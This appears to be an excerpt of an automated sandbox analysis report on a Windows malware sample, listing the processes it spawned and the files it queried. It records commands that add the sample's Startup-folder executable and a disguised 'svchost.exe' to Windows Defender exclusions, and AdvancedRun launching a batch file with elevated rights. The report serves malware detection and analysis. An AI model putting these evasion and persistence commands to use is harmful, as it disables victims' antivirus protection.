                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /SpecialRun 4101d8 6924Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6396 -ip 6396
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /SpecialRun 4101d8 2540
                      Source: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /SpecialRun 4101d8 3712
                      Source: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /SpecialRun 4101d8 5616
                      Source: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /SpecialRun 4101d8 2028
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,7_2_00401C26
                      Source: lKJbVguaav.exe, 00000000.00000000.373079098.0000000001C00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: lKJbVguaav.exe, 00000000.00000000.373079098.0000000001C00000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: lKJbVguaav.exe, 00000000.00000000.373079098.0000000001C00000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: lKJbVguaav.exe, 00000000.00000000.373079098.0000000001C00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: lKJbVguaav.exe, 00000000.00000000.373079098.0000000001C00000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Users\user\Desktop\lKJbVguaav.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
